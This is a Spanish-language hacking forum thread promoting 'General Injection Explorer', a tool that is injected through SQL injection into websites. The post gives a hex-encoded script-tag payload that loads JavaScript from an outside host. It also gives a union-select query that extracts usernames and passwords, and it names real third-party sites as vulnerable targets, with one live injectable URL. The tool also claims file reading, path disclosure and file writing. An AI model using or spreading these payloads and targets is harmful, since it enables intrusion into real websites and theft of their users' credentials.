cuando unes el select en la inyección, marcas la cantidad de columnas y en una que se muestre ingresas todo ese codigo.
es un tag <script> que llama a gie.js en hexadecimal (para poder imprimirlo) y los (()) son para "dividir" la url desde el código javascript.
Luego, mediante peticiones ajax, se inyecta entre los (()) algo como esto:

.php?id=12 and 0 union all select 1,2,(( select concat(user,pass) from users limit 4,1 )),4--

En realidad, mirando el código de fuente, se puede ver que las inyecciones son un tanto mas complejas. Pero básicamente es eso.

General Injection Explorer 4.8
version anterior.

• ajax peticiones con async
• dumpea tablas en <table> y .SQL
• full path disclosure
• write file

-> usar ((0xCode)) en vez de (0xCode)



@name: General Injection Explorer
@version: 4.8
@author: PonyMagic
@date: 12/12/2010 - 2:51
@contact: PonyMagic@live.com


PD: si ni sabes como funciona, abajo del titulo podes ver el post de la versión anterior.[/b]

crea otra capa, con un MC negro que ocupe todo, balaje la opacidad y dejate de joder.
y si no es eso, aprende a preguntar por lo menos... 

1) Disfumine por si Murder se quejaba, asi solamente quitaba las SQLi. ( Murder: el admin de diosdelared )
2) http://comic-ar.com/entrada.php?Id=86'
3) Agradeceria que comenten algo sobre el post en vez de discutir como diferenciar un modulo vulnerable a SQLi.

No voy a escribir una descripción de que es la GiE, las nuevas características, etc, etc.
Simplemente voy a dejar el link de la VERSION 3.0 para el que quiera saber "que es".
De esta nueva version solo voy a poner algunos screens, links con ejemplos, el código de fuente y el código para insertarlo en cualquier SQLi.

• Screens:
  
  
  
  explorador de bases de datos.
  
  
  lector de archivos, con Bruteforce.
  
  
  consola de peticiones, en la imagen un ejemplo
  de una query que busca mails en la base de datos.
  
  
  variables del servidor
  
  
  
  Historial de Inyecciones, para el que quiera
  saber un poco mas sobre el funcionamiento de la GIE
  
  
  
  
  
  
• Ejemplos:
  
  SQLi GIE [adegasgalegas.es]
  SQLi GIE [rubias19.com]
  SQLi GIE [comic-ar.com]
  
  
  
  
• Usarlo en cualqueir SQLi:
  
  En una SQLi, unis otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
  En un valor que printee (que se muestre en la web), simplemente copias y pegas el codigo de la GIE.
  
  
  Código:

  (0x3c736372697074207372633d22687474703a2f2f73696e64656c656e2e636c2f61646d696e2f75706c6f6164732f696d616765732f4769452e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)

  
  
  
  
  Codigo de fuente
  Codigo de fuente Paste2 Highlight
  
  
  
  

si borran mi super mensaje anti-invisible_hack, que borren el suyo tambien... sino escribo el mio denuevo!  

gracias por el dato, lo voy a tener en cuenta!
si alguien tiene alguna critica "constructiva" o no   
por favor que comente, asi la proxima queda mejor 

[?] Que es?
Basicamente es un explorador de bases de datos MySQL via SQLi, "incrustado" en la inyeccion.

[!] Que tiene la version 3.0?

• Codeado desde 0.
• Bypasseo de "illegal operation", y limite de group_concat_max_len.
• Mejor manejo de CSS && DIVS.
• Peticiones realizadas con AJAX.
• Nueva forma de ver tablas, MUCHO mas ordenadas.

[?] Como se usa?
En una SQLi, unis otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
En un valor que printee (que se muestre en la web), simplemente copias y pegas el codigo de la GIE.


Ejemplo:
adegasgalegas.es SQLi
adegasgalegas.es GIE SQLi





Luego, se navegan las bases de datos, usando ese "cuadradito" como un mini-phpmyadmin como se ve en el siguiente [.gif]:

• Gracias a virtux por hostear, acá tienen el código y el link:

Link JS
Link Paste2 [Highlight]